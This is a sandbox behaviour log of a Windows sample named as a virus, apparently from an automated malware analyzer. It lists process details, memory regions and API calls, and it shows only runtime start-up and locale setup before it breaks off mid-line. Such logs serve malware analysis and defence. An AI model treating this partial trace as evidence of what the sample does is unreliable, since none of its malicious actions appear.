# Flog Txt Version 1 # Analyzer Version: 4.4.0 # Analyzer Build Date: Dec 8 2021 20:04:45 # Log Creation Date: 11.01.2022 17:49:08.600 Process: id = "1" image_name = "d609a21245d77dccd6d4a659cbd9466a.virus.exe" filename = "c:\\users\\keecfmwgj\\desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe" page_root = "0x483d4000" os_pid = "0xe5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x390" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 112 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 113 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 114 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 115 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 116 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 117 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 118 start_va = 0x400000 end_va = 0x44dfff monitored = 1 entry_point = 0x402ed7 region_type = mapped_file name = "d609a21245d77dccd6d4a659cbd9466a.virus.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe") Region: id = 119 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 120 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 121 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 122 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 123 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 124 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 125 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 126 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 127 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 266 start_va = 0x240000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 267 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 268 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 269 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 270 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 271 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 272 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 273 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 274 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 275 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 276 start_va = 0x450000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 277 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 278 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 279 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 280 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 281 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 282 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 283 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 284 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 285 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 286 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 287 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 288 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 289 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 290 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 291 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 292 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 293 start_va = 0x5f0000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 294 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 295 start_va = 0x750000 end_va = 0x8d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 296 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 297 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 298 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 299 start_va = 0x8e0000 end_va = 0xa60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 300 start_va = 0xa70000 end_va = 0x1e6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 301 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 302 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 303 start_va = 0x2c0000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 304 start_va = 0x210000 end_va = 0x217fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 305 start_va = 0x1e70000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e70000" filename = "" Region: id = 306 start_va = 0x220000 end_va = 0x224fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 307 start_va = 0x220000 end_va = 0x224fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 308 start_va = 0x220000 end_va = 0x228fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 309 start_va = 0x74440000 end_va = 0x744bffff monitored = 0 entry_point = 0x744537c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 310 start_va = 0x300000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 311 start_va = 0x5f0000 end_va = 0x6cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 312 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 313 start_va = 0x743c0000 end_va = 0x743d2fff monitored = 0 entry_point = 0x743c1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 314 start_va = 0x230000 end_va = 0x232fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 315 start_va = 0x230000 end_va = 0x230fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Thread: id = 1 os_tid = 0xe60 [0056.602] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xa515fba0, dwHighDateTime=0x1d80713)) [0056.602] GetCurrentProcessId () returned 0xe5c [0056.602] GetCurrentThreadId () returned 0xe60 [0056.602] GetTickCount () returned 0xb23a64 [0056.602] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=1182018059558) returned 1 [0056.623] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0056.623] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2f0000 [0056.627] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0056.627] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0056.628] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0056.628] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0056.628] GetProcAddress (hModule=0x769b0000, lpProcName="FlsFree") returned 0x769c354f [0056.628] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0056.628] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0056.628] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0056.628] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0056.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0056.629] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0056.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0056.629] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0056.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0056.629] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0056.630] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0056.630] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0056.630] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0056.630] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0056.631] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0056.631] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0056.631] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x214) returned 0x2f07d0 [0056.631] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0056.632] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0056.632] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0056.632] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0056.632] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0056.632] GetCurrentThreadId () returned 0xe60 [0056.632] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0056.632] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x800) returned 0x2f09f0 [0056.633] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0056.633] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0056.633] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0056.633] SetHandleCount (uNumber=0x20) returned 0x20 [0056.633] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe\" " [0056.633] GetEnvironmentStringsW () returned 0x5023c8* [0056.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1415, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1415 [0056.633] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x587) returned 0x2f11f8 [0056.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1415, lpMultiByteStr=0x2f11f8, cbMultiByte=1415, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1415 [0056.633] FreeEnvironmentStringsW (penv=0x5023c8) returned 1 [0056.633] GetLastError () returned 0x0 [0056.633] SetLastError (dwErrCode=0x0) [0056.633] GetLastError () returned 0x0 [0056.633] SetLastError (dwErrCode=0x0) [0056.633] GetLastError () returned 0x0 [0056.633] SetLastError (dwErrCode=0x0) [0056.633] GetACP () returned 0x4e4 [0056.633] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x220) returned 0x2f1788 [0056.633] GetLastError () returned 0x0 [0056.634] SetLastError (dwErrCode=0x0) [0056.634] IsValidCodePage (CodePage=0x4e4) returned 1 [0056.634] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0056.634] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0056.634] GetLastError () returned 0x0 [0056.634] SetLastError (dwErrCode=0x0) [0056.634] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0056.634] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0056.634] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0056.634] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0056.634] GetLastError () returned 0x0 [0056.634] SetLastError (dwErrCode=0x0) [0056.634] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0056.634] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0056.634] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ돏\䃚) returned 256 [0056.634] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ돏\䃚, cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0056.634] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ돏\䃚, cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0056.634] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 